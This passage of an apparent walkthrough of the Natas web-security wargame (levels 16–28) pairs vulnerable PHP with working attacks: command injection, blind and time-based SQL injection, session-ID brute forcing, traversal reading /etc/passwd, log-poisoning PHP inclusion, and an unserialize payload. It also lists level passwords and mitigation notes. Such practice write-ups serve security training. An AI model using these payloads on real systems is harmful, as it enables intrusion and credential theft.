    needle = f"$(grep -E ^{pattern} /etc/natas_webpass/natas17){sentinel}"
    return {"needle": needle}


def try_pattern(
    params: dict, session: requests.Session, url: str, sentinel: str
) -> bool:
    with session.get(url, params=params) as response:
        return sentinel not in response.text


if __name__ == "__main__":

    url = "http://natas16.natas.labs.overthewire.org"
    session = requests.Session()
    session.auth = ("natas16", "WaIHEacj63wnNIBROHeqi3p9t0m5nhmh")
    chars = string.ascii_letters + string.digits
    sentinel = "Eskimo"

    matches = ""

    while len(matches) < 32:  # assume password is 32 chars long
        for c in chars:
            pattern = matches + c
            if try_pattern(get_query_params(pattern, sentinel), session, url, sentinel):
                matches += c
            print(f"Matched: {matches}", end="\r")

    print(f"Password: {matches}")

Running the program produces the password after some time:

$ python3 natas16.py
Password: 8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw

Conclusion

The lesson here is that information can be gained by the different behavior exhibited by the site on command success or failure. The other takeaway is that character filters are often incomplete. Like the previous level, rate limits would go a long way in making the attack less practical, especially with an exponentially increasing reset.

Level 17

This one is an iteration on Level15 without any output:

<?
//snip
if(array_key_exists("username", $_REQUEST)) {
    $link = mysql_connect('localhost', 'natas17', '<censored>');
    mysql_select_db('natas17', $link);

    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }

    $res = mysql_query($query, $link);
    if($res) {
        if(mysql_num_rows($res) > 0) {
        //echo "This user exists.<br>";
        } else {
        //echo "This user doesn't exist.<br>";
        }
    } else {
        //echo "Error in query.<br>";
    }
//snip
?>

With no output, this is a completely blind attack. The same baseline SQL query from Level 15 can be applied, but using sleep within an if statement:

SELECT * from users where username="natas18" and if(binary left(password, 3) = "abc", sleep(5), 1) --

With the above statement, the server should wait for 5 seconds if the password matches the input. Given this, the same type of brute force attacks used for the previous levels can be re-used here, but the response time is used as an indicator of success/failure. With fewer successful requests than failures it makes sense to place the sleep command in this position given the if statement syntax:

IF(condition, value_if_true, value_if_false)

Time for python:

natas17.py

import requests
import string


def get_query_string_params(char: str, index: int) -> dict:
    query = (
        f'natas18" and if(binary left(password, {index}) = "{char}", sleep(5), 1) -- '
    )
    return {"username": query}


def check_character(char: str, index: int, session: requests.Session, url: str) -> bool:
    params = get_query_string_params(char, index)
    with session.post(url, data=params) as response:
        return response.elapsed.total_seconds() > 5  # success


if __name__ == "__main__":

    url = "http://natas17.natas.labs.overthewire.org"
    session = requests.Session()
    session.auth = ("natas17", "8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw")
    chars = string.ascii_letters + string.digits
    matches = ""

    while len(matches) < 32:  # assume password is 32 chars long
        for c in chars:
            if check_character(matches + c, len(matches) + 1, session, url):
                matches += c
            print(f"Matched: {matches}", end="\r")

    print(f"Password: {matches}")

... and get the password:

$ python3 natas17.py
Password: xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP

Conclusion

Same takeaway as the previous level: Information can be gained by other means than simply output. If not using query parameterization for some reason, it is a a good idea to filter out undesirable SQL statements.

Level 18

Time for something slightly different? The following code is provided, having removed noisy comment blocks and edited various sections to simplify the representation:

<?

$maxid = 640; // 640 should be enough for everyone

function createID($user) {
    global $maxid;
    return rand(1, $maxid);
}

function debug($msg) {
    if(array_key_exists("debug", $_GET)) {
        print "DEBUG: $msg<br>";
    }
}

function my_session_start() {
    if(array_key_exists("PHPSESSID", $_COOKIE) and is_numeric($_COOKIE["PHPSESSID"])) {
        if(!session_start()) {
            debug("Session start failed");
            return false;
        } else {
            debug("Session start ok");
            if(!array_key_exists("admin", $_SESSION)) {
                debug("Session was old: admin flag set");
                $_SESSION["admin"] = 0; // backwards compatible, secure
            }
            return true;
        }
    }
    return false;
}

function print_credentials() {
    if($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1) {
        print "You are an admin. The credentials for the next level are:<br>";
        print "<pre>Username: natas19\n";
        print "Password: <censored></pre>";
    } else {
        print "You are logged in as a regular user. Login as an admin to retrieve credentials for natas19.";
    }
}

$showform = true;
if(my_session_start()) {
    print_credentials();
    $showform = false;
} else {
    if(array_key_exists("username", $_REQUEST) && array_key_exists("password", $_REQUEST)) {
        session_id(createID($_REQUEST["username"]));
        session_start();
        $_SESSION["admin"] = 0;
        debug("New session started");
        $showform = false;
        print_credentials();
    }
} 

if($showform) {
?>
<p>
Please login with your admin account to retrieve credentials for natas19.
</p>

<form action="index.php" method="POST">
Username: <input name="username"><br>
Password: <input name="password"><br>
<input type="submit" value="Login" />
</form>
<? } ?>

First, my_session_start() is called, which checks if there is an existing session. This is done by way of checking for a cookie named PHPSESSID. If there is no existing session this function does nothing. If session_start() is able to load an existing session through the PHPSESSID cookie there is a check if the admin key is present. If not, it is set to 0.

When no session is present a new one will be created using session_id(). This function can take some input to define the session identifier, which in this case is limited to 640. It should be possible to just find an existing session that belongs to "admin" within that range.

Here's an example of a new session being created and then used:

$ curl -s -X POST http://natas18.natas.labs.overthewire.org?debug \
> -u natas18:$PW \
> -F "username=foo" -F "password=bar" \
> -c - |
> grep -i "debug\|phpsessid"
DEBUG: New session started<br>You are logged in as a regular user. Login as an admin to retrieve credentials for natas19.<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
#HttpOnly_natas18.natas.labs.overthewire.org    FALSE   /       FALSE   0       PHPSESSID       310
$ curl -s http://natas18.natas.labs.overthewire.org?debug \
> -u natas18:$PW \
> -b "PHPSESSID=310" |
> grep -i "debug"
DEBUG: Session start ok<br>You are logged in as a regular user. Login as an admin to retrieve credentials for natas19.<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>

And a few lines of bash:

$ for i in {1..640}
> do
> curl -s http://natas18.natas.labs.overthewire.org \
> -u natas18:$PW
> -b "PHPSESSID=$i" | grep "Password"
> if [ "$?" == "0" ]; then
> break
> fi
> done | grep "Password"
Password: 4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs</pre><div id="viewsource"><a href="index-source.html">View sourcecode</a></div>

grep is used twice here to exit the loop once the password is found, then only capture the relevant output of the command.

Conclusion

As stated in Level 5, using cookies to manage sessions and states is not necessarily always a bad idea, but values need to be randomly generated using a sufficient amount of entropy.

Level 19

This level presents the following message:

This page uses mostly the same code as the previous level, but session IDs are no longer sequential...

Seems like a reasonable idea to check the session identifier format:

$ curl -s -X POST http://natas19.natas.labs.overthewire.org \
> -u natas19:$PW \
> -F "username=foo" -F "password=bar" \
> -c - | grep "PHPSESSID"
#HttpOnly_natas19.natas.labs.overthewire.org    FALSE   /       FALSE   0       PHPSESSID       3137332d666f6f
...
#HttpOnly_natas19.natas.labs.overthewire.org    FALSE   /       FALSE   0       PHPSESSID       3530382d666f6f
#HttpOnly_natas19.natas.labs.overthewire.org    FALSE   /       FALSE   0       PHPSESSID       3334332d666f6f
$ curl -s -X POST http://natas19.natas.labs.overthewire.org \
> -u natas19:$PW \
> -F "username=foo" -F "password=baz" \
> -c - | grep "PHPSESSID"
#HttpOnly_natas19.natas.labs.overthewire.org    FALSE   /       FALSE   0       PHPSESSID       3237312d666f6f
...
#HttpOnly_natas19.natas.labs.overthewire.org    FALSE   /       FALSE   0       PHPSESSID       3538382d666f6f
$ curl -s -X POST http://natas19.natas.labs.overthewire.org \
> -u natas19:$PW \
> -F "username=moo" -F "password=bar" \
> -c - | grep "PHPSESSID"
#HttpOnly_natas19.natas.labs.overthewire.org    FALSE   /       FALSE   0       PHPSESSID       3434382d6d6f6f
$ curl -s -X POST http://natas19.natas.labs.overthewire.org \
> -u natas19:$PW \
> -F "username=AAAAAAAA" -F "password=bar" \
> -c - | grep "PHPSESSID"
#HttpOnly_natas19.natas.labs.overthewire.org    FALSE   /       FALSE   0       PHPSESSID       3333332d4141414141414141

The trailing portion of the session identifier appears to be correlated to the username. The last one is an immediate giveaway that this is ASCII characters:

$ echo "3333332d4141414141414141" | xxd -p -r
333-AAAAAAAA # [session-id]-[username]
$ echo -n "admin" | xxd -p
61646d696e

Assuming that there is still a maximum of 640 sessions (this time per user name), let's update our previous script:

$ for i in {1..640}
> do
> PHPSESSID=$(echo -n "${i}-admin" | xxd -p)
> curl -s http://natas19.natas.labs.overthewire.org \
> -u natas19:$PW \
> -b "PHPSESSID=$PHPSESSID" |
> grep -e "Password"
> if [ "$?" == "0" ]; then
> break
> fi
> done |
> grep "Password" # hit enter and go grab a coffee
Password: eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF</pre></div>

Conclusion

Not much to add in terms of commentary compared to previous level. Outside of what has already been mentioned about randomness of cookies, this attack could be a lot more difficult with some restrictions specifically designed to deter brute force attacks, such as rate limits or exponential delays on failure.

Level 20

Level 20 presents the following code, subjected to a bit of cleanup and removal of unimportant items:

<?
function debug($msg) {
    if(array_key_exists("debug", $_GET)) {
        print "DEBUG: $msg<br>";
    }
}

function print_credentials() {
    if($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1) {
        print "You are an admin. The credentials for the next level are:<br>";
        print "<pre>Username: natas21\n";
        print "Password: <censored></pre>";
    } else {
        print "You are logged in as a regular user. Login as an admin to retrieve credentials for natas21.";
    }
}

function myread($sid) { 
    debug("MYREAD $sid"); 
    if(strspn($sid, "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM-") != strlen($sid)) {
    debug("Invalid SID"); 
        return "";
    }
    $filename = session_save_path() . "/" . "mysess_" . $sid;
    if(!file_exists($filename)) {
        debug("Session file doesn't exist");
        return "";
    }
    debug("Reading from ". $filename);
    $data = file_get_contents($filename);
    $_SESSION = array();
    foreach(explode("\n", $data) as $line) {
        debug("Read [$line]");
        $parts = explode(" ", $line, 2);
        if($parts[0] != "") $_SESSION[$parts[0]] = $parts[1];
    }
    return session_encode();
}

function mywrite($sid, $data) {
    // $data contains the serialized version of $_SESSION
    // but our encoding is better
    debug("MYWRITE $sid $data");
    // make sure the sid is alnum only!!
    if(strspn($sid, "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM-") != strlen($sid)) {
        debug("Invalid SID");
        return;
    }
    $filename = session_save_path() . "/" . "mysess_" . $sid;
    $data = "";
    debug("Saving in ". $filename);
    ksort($_SESSION);
    foreach($_SESSION as $key => $value) {
        debug("$key => $value");
        $data .= "$key $value\n";
    }
    file_put_contents($filename, $data);
    chmod($filename, 0600);
}

session_set_save_handler(
    "myopen", 
    "myclose", 
    "myread", 
    "mywrite", 
    "mydestroy", 
    "mygarbage");
session_start();

if(array_key_exists("name", $_REQUEST)) {
    $_SESSION["name"] = $_REQUEST["name"];
    debug("Name set to " . $_REQUEST["name"]);
}

print_credentials();

$name = "";
if(array_key_exists("name", $_SESSION)) {
    $name = $_SESSION["name"];
}
?>

This is an iteration of previous levels, where session_set_save_handler() is used to save and load session data. Out of the required functions, only the read and write callables are implemented with anything interesting.

The mywrite function simply creates a string buffer of each key:value pair from the session data, separating each with a newline and writing the output to a file based on the session identifier. The myread function reads the same data and parses each line into a key:value pair splitting each new pair by a newline character, then key and value by whitespace:

foreach(explode("\n", $data) as $line) {
    debug("Read [$line]");
    $parts = explode(" ", $line, 2);
    if($parts[0] != "") $_SESSION[$parts[0]] = $parts[1];
}

It should be possible to make this function read out two separate key:value pairs by injecting a well placed newline character in the name field: "name=user%0Aadmin%201" (%0A is URL-encoded newline). There is also an option to set an easy-to-remember cookie instead of the random value generated by the server:

$ curl -s -X POST http://natas20.natas.labs.overthewire.org \
> -u natas20:$PW \
> -d "name=user%0Aadmin%201" \
> -b "PHPSESSID=c00k13" > /dev/null
$ curl -s http://natas20.natas.labs.overthewire.org \
> -u natas20:$PW \
> -b "PHPSESSID=c00k13" |
> grep "Password:"
> Password: IFekPyrQXftziDEsUr3x21sYuahypdgJ</pre>

Conclusion

Clearly, the "better" encoding is not particularly good. Any session state related to access control must be maintained in a way that is entirely managed server side.

Level 21

At first glance, this one looks similar to Level 20:

<?
function print_credentials() {
    if($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1) {
        print "You are an admin. The credentials for the next level are:<br>";
        print "<pre>Username: natas22\n";
        print "Password: <censored></pre>";
    } else {
        print "You are logged in as a regular user. Login as an admin to retrieve credentials for natas22.";
    }
}

session_start();
print_credentials();

?>

The body contains a note and link to another page:

<p>
<b>Note: this website is colocated with
    <a href="http://natas21-experimenter.natas.labs.overthewire.org">
    http://natas21-experimenter.natas.labs.overthewire.org</a></b>
</p>

It seems likely that the vulnerability would be located on that site. The site accepts the natas20 credentials and presents a form to manipulate the style of a basic HTML div element. The following source code is provided:

<?
session_start();

// if update was submitted, store it
if(array_key_exists("submit", $_REQUEST)) {
    foreach($_REQUEST as $key => $val) {
        $_SESSION[$key] = $val;
    }
}

if(array_key_exists("debug", $_GET)) {
    print "[DEBUG] Session contents:<br>";
    print_r($_SESSION);
}

// only allow these keys
$validkeys = array("align" => "center", "fontsize" => "100%", "bgcolor" => "yellow");
$form = "";

$form .= '<form action="index.php" method="POST">';
foreach($validkeys as $key => $defval) {
    $val = $defval;
    if(array_key_exists($key, $_SESSION)) {
        $val = $_SESSION[$key];
    } else {
        $_SESSION[$key] = $val;
    }
    $form .= "$key: <input name='$key' value='$val' /><br>";
}
$form .= '<input type="submit" name="submit" value="Update" />';
$form .= '</form>';

$style = "background-color: ".$_SESSION["bgcolor"]."; text-align: ".$_SESSION["align"]."; font-size: ".$_SESSION["fontsize"].";";
$example = "<div style='$style'>Hello world!</div>";

?>

Given the highlighted lines, it should be possible to create arbitrary key:value pairs in the session. Since the sites are co-hosted session identifiers may be shared between the two. Only one way to find out:

$ curl -s -X POST http://natas21-experimenter.natas.labs.overthewire.org/index.php?debug \
> -u natas21:$PW \
> -d "submit=orly" -d "admin=1" -d "bgcolor=green" \
> -b "PHPSESSID=omnomnom" | grep -A6 "DEBUG"
[DEBUG] Session contents:<br>Array
(
    [debug] =>
    [submit] => orly
    [admin] => 1
    [bgcolor] => green
)
$ # reuse session with the other site
$ curl -s http://natas21.natas.labs.overthewire.org \
> -u natas21:$PW \
> -b "PHPSESSID=omnomnom" |
> grep "Password:"
Password: chG9fbe1Tq2eWVMgjYYD1MsfIvN461kJ</pre>

Conclusion

This level presented a new concept, where a session state can be created in one location (page) and re-used in another. This is something developers need to consider carefully when allowing users to manipulate session states: after all, these are valid use cases for this (at least within an application with multiple pages). If sessions are not intended to be re-used between applications, they should not be able to access each other's files. This can be achieved by using separate accounts, encrypting the session files with separate keys or (in the age of disposable compute) just running them on different servers.

Level 22

This level includes a Harry Potter reference:

<?
session_start();

if(array_key_exists("revelio", $_GET)) {
    // only admins can reveal the password
    if(!($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1)) {
        header("Location: /");
    }
}
// snip
if(array_key_exists("revelio", $_GET)) {
    print "You are an admin. The credentials for the next level are:<br>";
    print "<pre>Username: natas23\n";
    print "Password: <censored></pre>";
}
?>

Both blocks will execute if the revelio query parameter is set. The first block will set the Location header to trigger a redirect if the user is not an admin. All that is required is to ignore the redirect, for example by using curl:

$ curl -s http://natas22.natas.labs.overthewire.org/index.php?revelio \
> -u natas22:$PW | grep "Password:"
Password: D0vlad33nQF0Hz2EP255TP5wSW9ZsRSE</pre>

Conclusion

Clients can't be trusted to follow redirect requests. While most browsers do this by default, the behavior can be prevented. An easy way to fix the issue on this level would be to call exit() in the first block, preventing further script execution.

Level 23

#23 introduces the somewhat unexpected way in which PHP handles comparing integers and strings:

<?php
if(array_key_exists("passwd",$_REQUEST)) {
    if(strstr($_REQUEST["passwd"],"iloveyou") && ($_REQUEST["passwd"] > 10 )) {
        echo "<br>The credentials for the next level are:<br>";
        echo "<pre>Username: natas24 Password: <censored></pre>";
    } else {
        echo "<br>Wrong!<br>";
    }
}
?>

In PHP versions prior to 8.0.0, comparing an integer and a "numeric string" will convert the string to an integer before the comparison. For example, "23natas" will become 23.

$ curl -s http://natas23.natas.labs.overthewire.org?passwd=1337iloveyou \
> -u natas23:$PW | grep -E -o "Password: [[:alnum:]]{32}"
Password: OsRmXFguozKpTZZ5X14zNO43379LZveg

Conclusion

While the specific example provided is unlikely to appear in other places, the lesson is that language features may have side effects or unexpected behavior. These nuances should be understood prior to implementation.

Level 24

Level 24 follows the pattern introduced by the previous level:

<?php
if(array_key_exists("passwd",$_REQUEST)){
    if(!strcmp($_REQUEST["passwd"],"<censored>")) {
        echo "<br>The credentials for the next level are:<br>";
        echo "<pre>Username: natas25 Password: <censored></pre>";
    } else {
        echo "<br>Wrong!<br>";
    }
}
?>

The objective is to make the strcmp return 0, which only happens if the two strings are equal. There's a comment in the documentation highlighting that comparing a string and an array will return 0. It is also possible to pass an array as an argument by appending [].

$ curl -s http://natas24.natas.labs.overthewire.org?passwd[] \
> -u natas24:$PW | grep -E -o "Password: [[:alnum:]]{32}"
Password: GHF6X7YwACaYYssHVY05cFq83hRktl4c

Conclusion

Language features and behavior must be well-understood before being used, especially in sensitive contexts. In this case, it would be a good idea to check that accessing passwd actually returns a string before verification.

Level 25

25 presents a quote and a drop-down list to switch between languages. In reviewing the provided source code one can see that the text is held in three global variables:

<?php
    session_start();
    setLanguage();

    echo "<h2>$__GREETING</h2>";
    echo "<p align=\"justify\">$__MSG";
    echo "<div align=\"right\"><h6>$__FOOTER</h6><div>";
?>

The text is loaded through an include statement, selecting a file based on the lang input parameter. The safeinclude function performs a few checks before including the file, or defaulting to en if this fails:

<?php
    function setLanguage(){
        /* language setup */
        if(array_key_exists("lang",$_REQUEST))
            if(safeinclude("language/" . $_REQUEST["lang"] ))
                return 1;
        safeinclude("language/en");
    }

    function safeinclude($filename){
        // check for directory traversal
        if(strstr($filename,"../")){
            logRequest("Directory traversal attempt! fixing request.");
            $filename=str_replace("../","",$filename);
        }
        // dont let ppl steal our passwords
        if(strstr($filename,"natas_webpass")){
            logRequest("Illegal file access detected! Aborting!");
            exit(-1);
        }
        // add more checks...

        if (file_exists($filename)) {
            include($filename);
            return 1;
        }
        return 0;
    }
/* snip */
?>

The first thing that stands out is that the directory traversal check is naive. It can easily be circumvented by using "....//" which will become "../" after the server has done its replacement. This enables loading any file, for example:

$ curl -s http://natas25.natas.labs.overthewire.org \
> -u natas25:$PW \
> -d "lang=....//....//....//....//....//etc/passwd" |
> grep "root"
root:x:0:0:root:/root:/bin/bash

Since the second check prevents using natas_webpass in the path, it is not possible to simply point to /etc/natas_webpass/natas26 using this approach. What about the .htpasswd file for the next level? Since the length and character set is known, brute forcing this could be feasible. In testing this it became evident that the file is not accessible to the user: something else is needed...

When the path contains natas_webpass the logRequest function is called:

function logRequest($message){
    $log="[". date("d.m.Y H::i:s",time()) ."]";
    $log=$log . " " . $_SERVER['HTTP_USER_AGENT'];
    $log=$log . " \"" . $message ."\"\n"; 
    $fd=fopen("/var/www/natas/natas25/logs/natas25_" . session_id() .".log","a");
    fwrite($fd,$log);
    fclose($fd);
}

Interesting. The log includes an unsanitized input by way of the User-Agent HTTP header. The resulting file name is also predictable since the session identifier can be controlled by setting the PHPSESSID cookie. By combining these issues, it should be possible to inject php code into the log file that reads the password file then loading that file using a subsequent call.

$ curl -s http://natas25.natas.labs.overthewire.org \
> -u natas25:$PW \
> -d "lang=/etc/natas_webpass/natas26" \
> -A "<? include('/etc/natas_webpass/natas26'); ?>" \
> -b "PHPSESSID=omnomnom" > /dev/null
$ curl -s http://natas25.natas.labs.overthewire.org \
> -u natas25:$PW \
> -d "lang=....//....//....//....//....//var/www/natas/natas25/logs/natas25_omnomnom.log" |
> grep -E " [[:alnum:]]{32}"
[07.11.2021 12::53:51] oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T

Bingpot!

Conclusion

This level demonstrated how vulnerabilities that may not be an immediate issue on their own can be combined to create a successful attack. Once again, the issues associated with inadequate sanitization for user input are highlighted.

Level 26

Level 26 provides a simple drawing tool, where lines can be drawn in a box based on two pairs of x and y coordinates that define the line start and end points.

The entry point of the code checks whether an existing drawing is available via a cookie or reads input data from input coordinates and then proceeds to render the image. In both cases, the state is saved through storeData():

<?php
    session_start();

    if (array_key_exists("drawing", $_COOKIE) ||
        (   array_key_exists("x1", $_GET) && array_key_exists("y1", $_GET) &&
            array_key_exists("x2", $_GET) && array_key_exists("y2", $_GET))){  
        $imgfile="img/natas26_" . session_id() .".png"; 
        drawImage($imgfile); 
        showImage($imgfile);
        storeData();
    }
?>

The fact that data is saved and loaded from a cookie provides a good hint on where to start: cookies can be manipulated by the user. This data is unserialized in both the storeData() and drawFromUserData() functions:

$drawing=unserialize(base64_decode($_COOKIE["drawing"]));

Since there is no sanitation of this data, it can be used to create objects with user-defined properties. This is where the Logger class, which otherwise is unused becomes interesting:

class Logger{
    private $logFile;
    private $initMsg;
    private $exitMsg;

    function __construct($file){
        $this->initMsg="#--session started--#\n";
        $this->exitMsg="#--session end--#\n";
        $this->logFile = "/tmp/natas26_" . $file . ".log";

        $fd=fopen($this->logFile,"a+");
        fwrite($fd,$initMsg);
        fclose($fd);
    }

    function log($msg){
        $fd=fopen($this->logFile,"a+");
        fwrite($fd,$msg."\n");
        fclose($fd);
    }

    function __destruct(){
        $fd=fopen($this->logFile,"a+");
        fwrite($fd,$this->exitMsg);
        fclose($fd);
    }
}

It should be possible to create an instance of Logger based on user-supplied data. The __destruct method is one of the so-called Magic methods which are automatically called at various stages of an object's lifecycle. Unsurprisingly, the __destruct method is called when the object is destroyed by the garbage collector.

Combined, this presents an opportunity to modify the logFile and exitMsg properties during object creation, enabling writing arbitrary data to an arbitrary file when the object is destroyed. This can be used to inject php code by placing the code in exitMsg. Since the natas26 user has access to the ./img directory, the file with injected code can be written there and then accessed using a simple GET request.

Serialized strings can be created manually, but an easy approach is to write some php to produce the desired output. For example:

natas26.php

<?php
class Logger {
    private $logFile;
    private $initMsg;
    private $exitMsg;

    function __construct() {
        $this->initMsg = "init";
        $this->exitMsg = "<?php include('/etc/natas_webpass/natas27')?>";
        $this->logFile = "img/natas26.php";
    }
}

$log = new Logger;
echo serialize($log);
echo "\n";
echo base64_encode(serialize($log));
?>

This generates the following serialized string and the base64 encoded version:

O:6:"Logger":3:{s:15:"LoggerlogFile";s:15:"img/natas26.php";s:15:"LoggerinitMsg";s:4:"init";s:15:"LoggerexitMsg";s:45:"<?php include('/etc/natas_webpass/natas27')?>";}
Tzo2OiJMb2dnZXIiOjM6e3M6MTU6IgBMb2dnZXIAbG9nRmlsZSI7czoxNToiaW1nL25hdGFzMjYucGhwIjtzOjE1OiIATG9nZ2VyAGluaXRNc2ciO3M6NDoiaW5pdCI7czoxNToiAExvZ2dlcgBleGl0TXNnIjtzOjQ1OiI8P3BocCBpbmNsdWRlKCcvZXRjL25hdGFzX3dlYnBhc3MvbmF0YXMyNycpPz4iO30=

This output is simply placed in a cookie named drawing to create the new file, followed by requesting that file to execute the code:

$ # create the file
$ curl -s http://natas26.natas.labs.overthewire.org \
> -u natas26:$PW \
> -b "drawing=Tzo2OiJMb2dnZXIiOjM6e3M6MTU6IgBMb2dnZXIAbG9nRmlsZSI7czoxNToiaW1nL25hdGFzMjYucGhwIjtzOjE1OiIATG9nZ2VyAGluaXRNc2ciO3M6NDoiaW5pdCI7czoxNToiAExvZ2dlcgBleGl0TXNnIjtzOjQ1OiI8P3BocCBpbmNsdWRlKCcvZXRjL25hdGFzX3dlYnBhc3MvbmF0YXMyNycpPz4iO30=" > /dev/null
$ # get the file
$ curl -s http://natas26.natas.labs.overthewire.org/img/natas26.php \
> -u natas26:$PW \
55TBjpPZUUJgVP5b3BnbG6ON9uDPVzCJ

And there we have it.

Conclusion

There are quite a few things that can be done to mitigate this type of vulnerability. Besides the obvious recommendation to not pass user input to unserialize, one could also avoid implementing magic methods and using the options parameter to restrict which classes are allowed to be created this way.

More robust approaches include using a standard data format such as JSON and only instantiating an object of the expected type. Finally, the issue can be avoided altogether by storing and managing this state server-side instead.

Level 27

27 presents a login prompt that accepts a username and password. The login logic first checks if the user exists, then verifies the password. Curiously, if the user does not exist, it is created. Causing the dumpData function to be called with the natas28 username should print the credentials, so that is the objective.

2023 UpdateOriginal

This level has been slightly updated when I revisited my solutions and my original approach no longer worked. The main difference is highlighted:

<?
function createUser($link, $usr, $pass){

    if($usr != trim($usr)) {
        echo "Go away hacker";
        return False;
    }
    $user=mysqli_real_escape_string($link, substr($usr, 0, 64));
    $password=mysqli_real_escape_string($link, substr($pass, 0, 64));

    $query = "INSERT INTO users (username,password) values ('$user','$password')";
    $res = mysqli_query($link, $query);
    if(mysqli_affected_rows($link) > 0){
        return True;
    }
    return False;
}
>

The user record is created from a substring of maximum length 64: the overflow used in the previous approach does not happen. The objective then is to provide an input that passes the check on line 3, but still ends up being inserted as "natas28" once MySQL has truncated the input from any whitespace. This can be achieved as follows:

$ NATAS28=$(python3 -c 'print("natas28" + 57 * " " + ".")')
$ curl -s -X POST http://natas27.natas.labs.overthewire.org -u natas27:$PW \
> -d "username=${NATAS28}" -d "password=" > /dev/null
$ curl -X POST -s http://natas27.natas.labs.overthewire.org -u natas27:$PW \
> -d "username=${NATAS28:0:64}" -d "password=" |
> tac | grep -oEm1 [[:alnum:]]{32}

A quick fix for this issue would be to move the highlighted lines to the start of the main if/else block, then use the escaped and truncated values throughout.

<?
// ...
if(array_key_exists("username", $_REQUEST) and array_key_exists("password", $_REQUEST)) {
    $link = mysql_connect('localhost', 'natas27', '<censored>');
    mysql_select_db('natas27', $link);

    if(validUser($link,$_REQUEST["username"])) {
        //user exists, check creds
        if(checkCredentials($link,$_REQUEST["username"],$_REQUEST["password"])){
            echo "Welcome " . htmlentities($_REQUEST["username"]) . "!<br>";
            echo "Here is your data:<br>";
            $data=dumpData($link,$_REQUEST["username"]);
            print htmlentities($data);
        }
        else{
            echo "Wrong password for user: " . htmlentities($_REQUEST["username"]) . "<br>";
        }
    }
    else {
        if(createUser($link,$_REQUEST["username"],$_REQUEST["password"])){ 
            echo "User " . htmlentities($_REQUEST["username"]) . " was created!";
        }
    }
    mysql_close($link);
} // ...
?>

The application stores data in a simple table with both username and password defined as varchar(64):

CREATE TABLE `users` (
`username` varchar(64) DEFAULT NULL,
`password` varchar(64) DEFAULT NULL
);

Reviewing the rest of the code, there is no place where input is restricted to 64 characters. Depending on how the MySQL database is configured, strict mode might not be enforced. Testing for strict mode can be done by sending a sample request with a username that exceeds 64 characters:

$ export NATAS28=$(python3 -c 'print("natas28" + 64 * " " + "a")')
$ curl -s -X POST http://natas27.natas.labs.overthewire.org \
> -u natas27:$PW \
> -d "username=${NATAS28}" -d "password=123" |
> grep natas28
User natas28                                                                a was created!<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>

The fact that the user was created successfully indicates that strict mode is not enforced; if it were, MySQL would have triggered an error for the query. At this point, attempting to log on with natas28 and the new password will return the password for the original natas28 user:

$ curl -X POST -s http://natas27.natas.labs.overthewire.org \
> -u natas27:$PW \
> -d "username=natas28" -d "password=123" | sed -n "/(/,/)/p"
(
    [username] =&gt; natas28
    [password] =&gt; JWwR438wkgTsNKBbcJoowyysdM82YjeF
)

So, how does this work? If strict mode not enforced, the database will truncate the data to match the maximum length when inserted, removing any trailing whitespace. That means the first request will create a second record with a username set to natas28, escaping the basic uniqueness check performed in isValidUser(). Next, the checkCredentials() function will proceed to verify the password against the new user account given the and operator. When dumpData() is called, the first record matching that username will be returned from the database.

This can be replicated with a new user foo for demonstration purposes:

$ export foo=$(python3 -c 'print("foo" + 64 * " " + "a")')
$ curl -X POST -s http://natas27.natas.labs.overthewire.org \
> -u natas27:$PW \
> -d "username=foo" -d "password=bar" > /dev/null # create 1st user
$ curl -X POST -s http://natas27.natas.labs.overthewire.org \
> -u natas27:$PW \
> -d "username=${foo}" -d "password=baz" > /dev/null # create 2nd user
$ curl -X POST -s http://natas27.natas.labs.overthewire.org \
> -u natas27:$PW \
> -d "username=foo" -d "password=baz" | sed -n "/(/,/)/p" # login with 2nd user
(
    [username] =&gt; foo
    [password] =&gt; bar
)

Conclusion

STRICT_ALL_TABLES is probably a good idea
Requests should be validated server-side
Paranoia can be a good thing. Especially when it comes to user input. Remember: everyone is out to get you!

Level 28

The application in level 28 lets the user search for computer-related jokes. No source code is provided so some experimentation will be needed to figure out how it works. When submitting a search the application responds with HTTP 302 and a Location HTTP header to redirect the user to a new page search.php with a query parameter:

$ curl -s -X POST -D - http://natas28.natas.labs.overthewire.org \
> -u natas28:$PW \
> --data-raw "query=void" | grep Location
Location: search.php/?query=G%2BglEae6W%2F1XjA7vRm21nNyEco%2Fc%2BJ2TdR0Qp8dcjPLJ
2QAB7XXD%2FTT%2F3%2BuiqX%2BJKSh%2FPMVHnhLmbzHIY7GAR1bVcy3Ix3D2Q5cVi8F6bmY%3D

Some experimentation indicates that the application:

returns at most 3 records
appears to use a LIKE '%<input>%' statement for the query matching
randomizes responses for more than 3 matches
- this might be implemented in the application and not the database query
the size of query parameter is related to the size of user input

The trailing %3D (=) hints that the data may be base64 encoded, but decoding it does not produce any immediately useful results:

>>> import base64
>>> from urllib.parse import unquote
>>> import textwrap
>>> query = (
    "G%2BglEae6W%2F1XjA7vRm21nNyEco%2Fc%2BJ2TdR0Qp8dcjPLJ2QAB7XXD%2FTT%2F3%2Bu"
    "iqX%2BJKSh%2FPMVHnhLmbzHIY7GAR1bVcy3Ix3D2Q5cVi8F6bmY%3D"
)
>>> decoded_query = base64.b64decode(unquote(query)).hex()
>>> print(textwrap.fill(decoded_query, 32))
1be82511a7ba5bfd578c0eef466db59c
dc84728fdcf89d93751d10a7c75c8cf2
c9d90001ed75c3fd34ffdfeba2a97f89
29287f3cc5479e12e66f31c863b18047
56d5732dc8c770f64397158bc17a6e66

